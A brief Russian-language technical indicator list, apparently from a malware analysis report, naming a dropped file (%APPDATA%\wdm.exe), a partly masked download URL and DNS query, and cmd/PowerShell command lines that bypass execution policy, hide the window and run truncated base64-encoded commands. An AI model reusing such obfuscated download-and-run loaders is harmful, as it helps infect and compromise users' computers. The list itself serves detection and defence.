Техническая информация
- %APPDATA%\wdm.exe
- http://lf###hosi.co.in///og.exe
- DNS ASK lf###hosi.co.in
- '%APPDATA%\wdm.exe'
- '<SYSTEM32>\cmd.exe' "/C pOweRsheLL.eXe -eX ByPasS -noP -w 1 -EC JABzAFUAcABPAGgATgBxAGUAcgBnAEYAbQBkAEkAIAAgAAkAPQAJAAkAIABAACgAIgAxADEALgAwACIACQAgAAkALAAgAAkAIAAiADEAMgAuADAAIgAgAAkAIAAsAAkACQAJACIAM...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/C pOweRsheLL.eXe -eX ByPasS -noP -w 1 -EC JABzAFUAcABPAGgATgBxAGUAcgBnAEYAbQBkAEkAIAAgAAkAPQAJAAkAIABAACgAIgAxADEALgAwACIACQAgAAkALAAgAAkAIAAiADEAMgAuADAAIgAgAAkAIAAsAAkACQAJACIAM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -eX ByPasS -noP -w 1 -EC JABzAFUAcABPAGgATgBxAGUAcgBnAEYAbQBkAEkAIAAgAAkAPQAJAAkAIABAACgAIgAxADEALgAwACIACQAgAAkALAAgAAkAIAAiADEAMgAuADAAIgAgAAkAIAAsAAkACQAJACIAMQA0AC4AMAAiAAkACQAgACwAIA...